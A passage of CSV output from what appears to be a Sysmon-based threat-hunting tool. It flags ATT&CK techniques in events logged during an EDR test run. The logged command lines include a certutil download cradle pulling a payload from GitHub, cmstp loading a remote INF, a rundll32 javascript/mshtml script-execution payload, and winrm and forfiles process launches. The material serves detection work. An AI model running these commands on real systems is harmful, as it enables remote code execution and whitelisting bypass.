SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564436075.878709,2019-07-30T01:34:35.878709+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm qc -q) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4993 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.663 + 747F3D96-666B-5D3F-0000-00102F7F8E00 + 3224 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-666B-5D3F-0000-001051638E00 + 5840 + C:\Windows\System32\cmd.exe + cmd /c winrm qc -q + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4991 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.285 + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4991 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.285 + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C 
"C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436075.337716,2019-07-30T01:34:35.337716+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm qc -q ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4990 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.246 + 747F3D96-666B-5D3F-0000-001051638E00 + 5840 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c winrm qc -q + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1553029831.815313,2019-03-20T01:10:31.815313+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966503 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:00:01.529 + 365ABB72-5851-5C91-0000-00107D050A00 + 2716 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement 
Program\Uploader" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=2003E9B15E1C502B146DAD2E383AC1E3,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-5851-5C91-0000-0010E1030A00 + 2772 + C:\Windows\System32\wsqmcons.exe + C:\Windows\System32\wsqmcons.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1564436070.807635,2019-07-30T01:34:30.807635+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4988 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:30.462 + 747F3D96-6666-5D3F-0000-0010AE068E00 + 1464 + C:\Windows\System32\forfiles.exe + 10.0.17763.1 (WinBuild.160101.0800) + ForFiles - Executes a command on selected files + Microsoft® Windows® Operating System + Microsoft Corporation + forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 + 747F3D96-6666-5D3F-0000-001016F78D00 + 2244 + C:\Windows\System32\cmd.exe + cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1553029201.518992,2019-03-20T01:00:01.518992+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966501 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 
2019-03-19 20:58:44.187 + 365ABB72-5804-5C91-0000-001044DE0900 + 2456 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 2 + System + MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-57FB-5C91-0000-00104FD40900 + 2128 + C:\osk.exe + "c:\osk.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436070.258082,2019-07-30T01:34:30.258082+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4986 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:30.221 + 747F3D96-6666-5D3F-0000-001016F78D00 + 2244 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436065.269897,2019-07-30T01:34:25.269897+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cmstp.exe /ni 
/s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4983 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:25.180 + 747F3D96-6661-5D3F-0000-00107AB88D00 + 6428 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436065.202954,2019-07-30T01:34:25.202954+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4982 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:34:20.735 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49833 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436061.867545,2019-07-30T01:34:21.867545+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process 
C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4981 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:34:20.619 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49832 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4980 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:20.410 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-665C-5D3F-0000-0010096B8D00 + 7088 + C:\Windows\System32\cmd.exe + cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt 
Default_File_Path2.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436061.8671,2019-07-30T01:34:21.867100+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4980 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:20.410 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-665C-5D3F-0000-0010096B8D00 + 7088 + C:\Windows\System32\cmd.exe + cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436060.262273,2019-07-30T01:34:20.262273+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4978 + + + + 
+ Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:20.134 + 747F3D96-665C-5D3F-0000-0010096B8D00 + 7088 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);})",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4977 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.502 + 747F3D96-6657-5D3F-0000-001011298D00 + 1004 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication 
";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4977 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.502 + 747F3D96-6657-5D3F-0000-001011298D00 + 1004 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication 
";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436060.238305,2019-07-30T01:34:20.238305+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4977 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.502 + 747F3D96-6657-5D3F-0000-001011298D00 + 1004 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication 
";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553029101.014473,2019-03-20T00:58:21.014473+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966480 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:58:20.894 + 365ABB72-57EC-5C91-0000-001097810900 + 2848 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Users\user01\Desktop\titi.sdb" + C:\Users\user01\Desktop\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility 
Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436055.252183,2019-07-30T01:34:15.252183+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4975 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:15.202 + 747F3D96-6657-5D3F-0000-001029198D00 + 1808 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new0ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028767.484881,2019-03-20T00:52:47.484881+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966464 + + 
+ + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:47.364 + 365ABB72-569F-5C91-0000-0010D96C0800 + 3140 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 